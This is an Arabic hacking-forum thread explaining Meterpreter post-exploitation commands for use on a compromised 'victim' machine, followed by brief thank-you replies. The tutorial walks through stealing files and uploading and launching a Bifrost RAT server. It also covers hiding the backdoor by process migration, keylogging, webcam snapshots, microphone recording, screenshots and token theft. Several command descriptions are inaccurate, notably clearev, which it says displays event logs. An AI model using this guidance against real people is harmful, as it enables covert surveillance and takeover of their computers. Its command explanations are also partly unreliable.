[ شرح ] ما بعـد وصول session في meterpreter

تم تحميل الصفحة في 0,3541883 ثانية
ما بعـد وصول session في meterpreter
الحالة
مغلق و غير مفتوح للمزيد من الردود.

zorax

Beginner Developer
rank
إنضم
11 مارس 2011
المشاركات
48
الإعجابات
7
النقاط
0
السلام عليكم و رحمة الله و بركاتة

كيف حال كل اعضاء الديف بوينت؟

انا قررت في هذا الدرس الرد على الاخ موجود والدرس هو ما بعد الوصول الىsession في meterpreter

نكتب الامر هذا عشان تضهر لنا خصائص الميتيربريتير

كود:
[COLOR=#000000][FONT=Simplified Arabic Fixed][COLOR=#0000bb]meterpreter [/COLOR][COLOR=#007700]> [/COLOR][/FONT][COLOR=#0000bb][FONT=Simplified Arabic Fixed]help  [/FONT][/COLOR]
[/COLOR]
راح تظهر لنا اوامر كثيره ان شاء الله نشرحها كلها

مجموعات ، في كل مجموعة اوامر

المجموعة الاولى :
Core Commands: و يعني بها اوامر اساسية يعني اوامر العودة الى الخلف اوامر اغلاق اوامر مساعدة
طيب نشرحها

كود:
[FONT=Simplified Arabic Fixed][COLOR=#007700]?             [/COLOR][/FONT][FONT=Simplified Arabic Fixed][COLOR=#0000bb]امر مساعدة مثل الامر الي طبقناه فوق help [/COLOR][/FONT]
[FONT=Simplified Arabic Fixed][COLOR=#0000bb]  background    العودة الى الخلف من الجلسة الى meterpreter [/COLOR][/FONT]
[FONT=Simplified Arabic Fixed][COLOR=#0000bb]  bgkill       يقتل اي برنامج مشغل في meterpreter [/COLOR][/FONT]
[FONT=Simplified Arabic Fixed][COLOR=#0000bb]  bglist        يطلع لك البرامج الي شغاله في meterpreter [/COLOR][/FONT]
[FONT=Simplified Arabic Fixed][COLOR=#0000bb]  bgrun         يشغل لك البرامج الي حطيتها في meterpreter [/COLOR][/FONT]
[FONT=Simplified Arabic Fixed][COLOR=#0000bb]  channel       يعطيك معلومات حول القنوات الي شغاله  [/COLOR][/FONT]
[FONT=Simplified Arabic Fixed][COLOR=#0000bb]  close         يستخدم بأقفال اي قناة مشغلها انت [/COLOR][/FONT]
[FONT=Simplified Arabic Fixed][COLOR=#007700]exit          [/COLOR][/FONT][FONT=Simplified Arabic Fixed][COLOR=#0000bb]لأغلاق او حذف الجلسة [/COLOR][/FONT]
[FONT=Simplified Arabic Fixed][COLOR=#0000bb]  help          نفس اول امر و هو طلب مساعدة او استخراج الاوامر [/COLOR][/FONT]
[FONT=Simplified Arabic Fixed][COLOR=#0000bb]  info          هذا الامر يستخدم لاستخراج معلومات حول اي موديل مشغله انت [/COLOR][/FONT]
[FONT=Simplified Arabic Fixed][COLOR=#0000bb]  interact      هذا لو تريد تتفاعل مع قناة مشغلها تستخدمة [/COLOR][/FONT]
[FONT=Simplified Arabic Fixed][COLOR=#0000bb]                 migrate       هذا يلعب بالبروسس يعني تقدر من خلاله تخفي الباكدور او البايلود من الامر هذا [/COLOR][/FONT]
[FONT=Simplified Arabic Fixed][COLOR=#0000bb]  quit          هذا الامر لانهاء الجلسة  [/COLOR][/FONT]
[FONT=Simplified Arabic Fixed][COLOR=#0000bb]  read          هذا للقرائة يستخدم [/COLOR][/FONT]
[FONT=Simplified Arabic Fixed][COLOR=#0000bb]  run           هذا يستخدم لتشغيل اي سكربت تركبة او برنامج او قناة  [/COLOR][/FONT]
[FONT=Simplified Arabic Fixed][COLOR=#007700]use           [/COLOR][/FONT][COLOR=#0000bb][FONT=Simplified Arabic Fixed]هذا الامر معروف بالميتا و هو معناة استخدم [/FONT][/COLOR]
[FONT=Simplified Arabic Fixed][COLOR=#0000bb]  write         هذا للكتابة لوتريد ان تكتب شي في قناة تستخدمة [/COLOR][/FONT]
المجموعة الثانية:
File system Command: هذي اوامر ملفات النظام يعني الاوامر هذي مهمه جداً هي تستخدم للرفع و التحميل و الانتقال و الحذف و لأهميتها راح اشرح كل امر فيها


الامر الاول :
كود:
[COLOR=#000000][COLOR=#0000bb][FONT=Simplified Arabic Fixed]cat  [/FONT][/COLOR][/COLOR]
و هذا معروف للقرائة ، مثلاً تريد قرائة ملف txt تكتب النفرض اسم الملف arhaby.txt نكتب الامر التالي لقرائتة
كود:
[COLOR=#000000][FONT=Simplified Arabic Fixed][COLOR=#0000bb]meterpreter [/COLOR][COLOR=#007700]> [/COLOR][COLOR=#0000bb]cat arhaby[/COLOR][COLOR=#007700].[/COLOR][/FONT][COLOR=#0000bb][FONT=Simplified Arabic Fixed]txt  [/FONT][/COLOR]
[/COLOR]
الامر الثاني :
كود:
[COLOR=#000000][COLOR=#0000bb][FONT=Simplified Arabic Fixed]cd [/FONT][/COLOR][/COLOR]
و هذا الامر يستخدم للتنقل يعني لا بغيت تنتقل الى مجلد السي C تكتب الامر التالي

كود:
[COLOR=#000000][FONT=Simplified Arabic Fixed][COLOR=#0000bb]meterpreter [/COLOR][COLOR=#007700]> [/COLOR][COLOR=#0000bb]cd C[/COLOR][COLOR=#007700]:[/COLOR][/FONT][/COLOR]
الامر الثالث :
كود:
[COLOR=#000000][COLOR=#0000bb][FONT=Simplified Arabic Fixed]del[/FONT][/COLOR][/COLOR]
هذا الامر يستخدم للحذف ، اذا اردت تحذف مجلد مثلاً اسمه zorax***** تمتب الامر التالي
كود:
[COLOR=#000000][FONT=Simplified Arabic Fixed][COLOR=#0000bb]meterpreter [/COLOR][COLOR=#007700]> [/COLOR][COLOR=#0000bb]del zorax[/COLOR][/FONT][COLOR=#007700][FONT=Simplified Arabic Fixed]*****  [/FONT][/COLOR]
[/COLOR]
الامر الرابع :
كود:
[COLOR=#000000][COLOR=#0000bb][FONT=Simplified Arabic Fixed]download[/FONT][/COLOR][/COLOR]
و هذا الامر يستخدم لتحميل الملفات الى جهاز المهاجم ، يعني اذا اردت تاخذ ملف من جهاز الضحية تستخدم الامر هذا و لنفرض اسم الملف IO.SYS نكتب له الامر التالي
كود:
[COLOR=#000000][FONT=Simplified Arabic Fixed][COLOR=#0000bb]meterpreter [/COLOR][COLOR=#007700]> [/COLOR][COLOR=#0000bb]download IO[/COLOR][COLOR=#007700].[/COLOR][COLOR=#0000bb]SYS[/COLOR][COLOR=#007700]
[*] [/COLOR][COLOR=#0000bb]downloading[/COLOR][COLOR=#007700]: [/COLOR][COLOR=#0000bb]IO[/COLOR][COLOR=#007700].[/COLOR][COLOR=#0000bb]SYS [/COLOR][COLOR=#007700]-> [/COLOR][COLOR=#0000bb]IO[/COLOR][COLOR=#007700].[/COLOR][COLOR=#0000bb]SYS[/COLOR][COLOR=#007700]
[*] [/COLOR][COLOR=#0000bb]downloaded [/COLOR][COLOR=#007700]: [/COLOR][COLOR=#0000bb]IO[/COLOR][COLOR=#007700].[/COLOR][COLOR=#0000bb]SYS [/COLOR][COLOR=#007700]-> [/COLOR][COLOR=#0000bb]IO[/COLOR][COLOR=#007700].[/COLOR][/FONT][COLOR=#0000bb][FONT=Simplified Arabic Fixed]SYS  [/FONT][/COLOR]
[/COLOR]
الامر الخامس :
كود:
[COLOR=#000000][COLOR=#0000bb][FONT=Simplified Arabic Fixed]edit[/FONT][/COLOR][/COLOR]
و هذا معروف من اسمه و هو لتعديل الملفات الموجودة بجهاز الضحية
يعني ا ردت تعدل على مجلد اسمه dev-point.SYS تكتب الامر التالي
كود:
[COLOR=#000000][FONT=Simplified Arabic Fixed][COLOR=#0000bb]meterpreter [/COLOR][COLOR=#007700]> [/COLOR][COLOR=#0000bb]edit dev-point[/COLOR][COLOR=#007700].[/COLOR][/FONT][COLOR=#0000bb][FONT=Simplified Arabic Fixed]SYS  [/FONT][/COLOR]
[/COLOR]
الامر السادس :
كود:
[COLOR=#000000][COLOR=#0000bb][FONT=Simplified Arabic Fixed]getlwd[/FONT][/COLOR][/COLOR]
هذا الامر يخبرك انت وين في جهازك انت ، يعني المهاجم يسأل meterpreter وين انا ؟
والسؤال يكون عن طريق الامر التالي

كود:
[COLOR=#000000][FONT=Simplified Arabic Fixed][COLOR=#0000bb]meterpreter [/COLOR][COLOR=#007700]> [/COLOR][/FONT][FONT=Simplified Arabic Fixed][COLOR=#0000bb]getlwd [/COLOR][COLOR=#007700]/[/COLOR][/FONT][COLOR=#0000bb][FONT=Simplified Arabic Fixed]root  [/FONT][/COLOR]
[/COLOR]
الامر السابع :
كود:
[COLOR=#000000][COLOR=#0000bb][FONT=Simplified Arabic Fixed]getwp[/FONT][/COLOR][/COLOR]
هذا الامر نفس الامر الي فوق لكن المهاجم يسأل اين انا في جهاز ضحيتي ؟
و السؤال يكون عن طريق الامر التالي

كود:
[COLOR=#000000][FONT=Simplified Arabic Fixed][COLOR=#0000bb]meterpreter [/COLOR][COLOR=#007700]> [/COLOR][/FONT][FONT=Simplified Arabic Fixed][COLOR=#0000bb]getwd [/COLOR][/FONT]
[FONT=Simplified Arabic Fixed][COLOR=#0000bb]C[/COLOR][COLOR=#007700]:********[/COLOR][COLOR=#0000bb]s [/COLOR][COLOR=#007700]and [/COLOR][COLOR=#0000bb]SettingsarhabyDesktop [/COLOR][/FONT][/COLOR]
الامر الاخير :
كود:
[COLOR=#000000][COLOR=#0000bb][FONT=Simplified Arabic Fixed]upload[/FONT][/COLOR][/COLOR]
و هذا الامر يستخدم لرفع الملفات في جهاز الضحية ، يعني اذا اخترقت الضحية و لا تريد ان تستخدم الاوامر تريد ان ترفع له باتش بيفروست تكتب له الامر التالي
كود:
[COLOR=#000000][FONT=Simplified Arabic Fixed][COLOR=#0000bb]meterpreter [/COLOR][COLOR=#007700]> [/COLOR][COLOR=#0000bb]upload jordan[/COLOR][COLOR=#007700]-[/COLOR][COLOR=#0000bb]hacker[/COLOR][COLOR=#007700]***** -> [/COLOR][COLOR=#0000bb]C[/COLOR][COLOR=#007700]:
[*] [/COLOR][COLOR=#0000bb]uploading  [/COLOR][COLOR=#007700]: [/COLOR][COLOR=#0000bb]jordan[/COLOR][COLOR=#007700]-[/COLOR][COLOR=#0000bb]hacker[/COLOR][COLOR=#007700]***** -> [/COLOR][COLOR=#0000bb]C[/COLOR][COLOR=#007700]:
[*] [/COLOR][COLOR=#0000bb]uploaded   [/COLOR][COLOR=#007700]: [/COLOR][COLOR=#0000bb]jordan[/COLOR][COLOR=#007700]-[/COLOR][COLOR=#0000bb]hacker[/COLOR][COLOR=#007700]***** -> [/COLOR][COLOR=#0000bb]C[/COLOR][COLOR=#007700]:[COLOR=blue]jordan[/COLOR][/COLOR][COLOR=#007700]-[/COLOR][COLOR=#0000bb]hacker[/COLOR][/FONT][COLOR=#007700][FONT=Simplified Arabic Fixed]*****  [/FONT][/COLOR]
[/COLOR]
امر تشغيل السيرفر

[CODE]start jordan-hacker.exe[/CODE]

هذه المجموعة الاولى الان سأتكلم عن المجموعة الثانية:

Networking Commands : و تعني بها اوامر الشبكات يعني استخراج اي بي الضحية في جهازه و البورتات هي ثلاث اوامر لنشرحها

كود:
[COLOR=#000000][COLOR=#0000bb][FONT=Simplified Arabic Fixed]    ipconfig      هذا الامر زي ifconfig في نظام ليونكس لكن في الوندوز نكتب الامر ipconfig و هو يخرج لنا الاي بي داخل الشبكة [/FONT][/COLOR]
[FONT=Simplified Arabic Fixed][COLOR=#000000]  portfwd       هذا يستخدم لتوجية المنافذ او البورتات [/COLOR][/FONT]
[FONT=Simplified Arabic Fixed][COLOR=#000000]  route         هذا يعرض لك التوجيهات و تقدر تعدلها من خلالة ولا انصح باستخدامها لانه ممكن تطير عليك الضحية[/COLOR][/FONT][/COLOR]
المجموعة الرابعة :
System Commands : و يعني بها اوامر النظام ، مثل يعني يطلع لك البروسس وش شغال بالجهاز ووو الـخ .........
طيب نشرحها
كود:
[COLOR=#000000][COLOR=#0000bb][FONT=Simplified Arabic Fixed]    clearev       هذا يطلع لك الاحداث في جهاز الضحية [/FONT][/COLOR]
[FONT=Simplified Arabic Fixed][COLOR=#000000]  drop_token    هذا الامريطلع لك على اي يوزر شغال انت في جهاز الضحية [/COLOR][/FONT][COLOR=#007700][FONT=Simplified Arabic Fixed]. [/FONT][/COLOR]
[COLOR=#0000bb][FONT=Simplified Arabic Fixed]execute       هذا الامر زي ما كأنك ماسك جهاز الضحية و تروح الى ابدأ ثم تروح تشغيل و بعدها تكتب cmd يعني تروح لسطر اوامر الضحية من جهازة [/FONT][/COLOR]
[FONT=Simplified Arabic Fixed][COLOR=#0000bb]  getpid        عيطيك معلومات عن العمليات الي تبي تعرف عنها انت [/COLOR][/FONT]
[FONT=Simplified Arabic Fixed][COLOR=#0000bb]  getprivs      يعطيك اكبر عدد من الامتيازات [/COLOR][/FONT]
[FONT=Simplified Arabic Fixed][COLOR=#0000bb]  getuid        هذا بعد يعلمك على اي يوزر انت الحين في جهاز الضحية [/COLOR][/FONT]
[FONT=Simplified Arabic Fixed][COLOR=#0000bb]  kill          هذا يستخدم لقتل العمليات في البروسس  [/COLOR][/FONT]
[FONT=Simplified Arabic Fixed][COLOR=#0000bb]  ps            هذا الامر يستعرض لك البروسس [/COLOR][/FONT]
[FONT=Simplified Arabic Fixed][COLOR=#0000bb]  reboot        يعيد تشغيل جهاز الضحية [/COLOR][/FONT]
[FONT=Simplified Arabic Fixed][COLOR=#0000bb]  reg           هذا الامرللتعديل لجهاز الضحية مع الاتصال البعيد ، يعني اذا مقفله تفتحه عن طريق الامر ، و الله اعلم [/COLOR][/FONT]
[FONT=Simplified Arabic Fixed][COLOR=#0000bb]  rev2self      و هذا الامر يستخدم للاتصال البعيد مع الضحية ، يعني ما بعد الامر الي قبلة [/COLOR][/FONT]
[FONT=Simplified Arabic Fixed][COLOR=#0000bb]  ****************l         هذا نفس المر الاكس كيوت [/COLOR][/FONT]
[FONT=Simplified Arabic Fixed][COLOR=#0000bb]  shutdown      هذا ايقاف تشغيل الكميوتر بعد  [/COLOR][/FONT]
[FONT=Simplified Arabic Fixed][COLOR=#0000bb]  steal_token   هذا الامر يحاول يسرق رمز تمثيل من العمليات الي شغاله في البروسس [/COLOR][/FONT][/COLOR]
[COLOR=#000000][COLOR=#0000bb][FONT=Simplified Arabic Fixed]sysinfo       هذا الامر يعطيك معلومات عن جهاز الضحية يعني نوع النظام و المعلومات هذي  [/FONT][/COLOR]
 
[/COLOR]
المجموعة الخامسة :
كود:
[COLOR=#000000][COLOR=#0000bb][FONT=Simplified Arabic Fixed]    enumdesktops   هذا الامر اذا كان الجهاز مدير على عدة اجهزه ، الامر هذا يستخرج الاجهزة الي فيه [/FONT][/COLOR]
[FONT=Simplified Arabic Fixed][COLOR=magenta]  getdesktop     هذا الامر يطلع لك سطح المكتب تبع الضحية في meterpreter الي تستخدمة انت [/COLOR][/FONT]
[FONT=Simplified Arabic Fixed][COLOR=magenta]   keyscan_dump  الامر هذا بعد ما تكتب الامر الي تحته يطلع لك كيلجور الضحية يعني تتابع الكيلجور عن طريق [/COLOR][/FONT]
[FONT=Simplified Arabic Fixed][COLOR=magenta]  keyscan_start ليتشغيل الكيلجور [/COLOR][/FONT]
[FONT=Simplified Arabic Fixed][COLOR=magenta]  keyscan_stop   لأيقاف الكيلجور [/COLOR][/FONT]
[FONT=Simplified Arabic Fixed][COLOR=magenta]  screenshot     يصور جهاز الضحية  [/COLOR][/FONT]
[FONT=Simplified Arabic Fixed][COLOR=magenta]  setdesktop     هذا الامر يستخدم اذا الضحية معه اكثر من سطح مكتب ، من خلال الامر هذا تتنقل في سطوح المكتب الخاصه فيه [/COLOR][/FONT]
[FONT=Simplified Arabic Fixed][COLOR=magenta]  uictl           الامر هذا يستخدم لايقاف الماوس و الكيبورد عند الضحية و تشغيله[/COLOR][/FONT][/COLOR]
المجموعة السادسة :
cam Commands : هذي المجموعة تتكون من ثلاث اوامر امر لتشغيل المايك ، يعني تسمع الضحية من خلال المايك عندة ، و الامر الثاني و الثالث للكام الخاص بالضحية


كود:
[COLOR=#000000][FONT=Simplified Arabic Fixed][COLOR=#0000bb]    [COLOR=#000000][COLOR=#0000bb]    record_mic    هذ الامر للاستماع الى مايك الضحية [/COLOR][/COLOR][/COLOR][/FONT][COLOR=#0000bb]
[COLOR=#0000bb][FONT=Simplified Arabic Fixed][COLOR=#0000bb]cam_list   هذا يطلع لك الكامات الموجودة في جهاز الضحية [/COLOR][/FONT]
[FONT=Simplified Arabic Fixed][COLOR=#0000bb]cam_snap   هذا الامر يستخدم بعد الامر الي قبله يعني الامر الي قبله يطلع لك الكامات و يرقمها و هذا تكتب الامر و بعده تكتب رقم الكام عشان يشتغل  [/COLOR][/FONT]
[/COLOR][/COLOR]
[/COLOR]
بالتوفيق للجميع

**************** sploit:12:






















 
إنضم
12 مارس 2011
المشاركات
501
الإعجابات
40
النقاط
0
رد: ما بعـد وصول session في meterpreter

مبــــــــــــــــدع


الله يبارك فيك
 

zorax

Beginner Developer
rank
إنضم
11 مارس 2011
المشاركات
48
الإعجابات
7
النقاط
0
رد: ما بعـد وصول session في meterpreter

مشكور اخي على مرورك
 

zorax

Beginner Developer
rank
إنضم
11 مارس 2011
المشاركات
48
الإعجابات
7
النقاط
0
رد: ما بعـد وصول session في meterpreter

مشكورين على المرور:6:
 
إنضم
9 مارس 2011
المشاركات
1,597
الإعجابات
977
النقاط
113
الإقامة
JoRdaN
رد: ما بعـد وصول session في meterpreter

شرح أكثر من رائع أخي

بارك الله فيك
 

AzizO

Beginner Developer
rank
إنضم
28 يوليو 2011
المشاركات
141
الإعجابات
11
النقاط
0
رد: ما بعـد وصول session في meterpreter

الله يبارك فيك
 
إنضم
22 أغسطس 2011
المشاركات
1,544
الإعجابات
1,585
النقاط
113
رد: ما بعـد وصول session في meterpreter

أرجوك يا أخي ساعدني ولك أحلى تقييم من فضلك لم أفهم الأمر upload أرجوك اشرحه لي من فضلك :27:
 
الحالة
مغلق و غير مفتوح للمزيد من الردود.

الأعضاء النشطين حاليآ الذين يشاهدون هذا الموضوع (1 عضو و 0 ضيف)

خيارات الاستايل

نوع الخط
مودك
اخفاء السايدر بار OFF
توسيط المنتدى OFF
فصل الأقسام OFF
الأقسام الفرعية OFF
عرض المشاركات
حجم الخط
معلومات العضو OFF
إخفاء التوقيع OFF

إرجاع خيارات الإستايل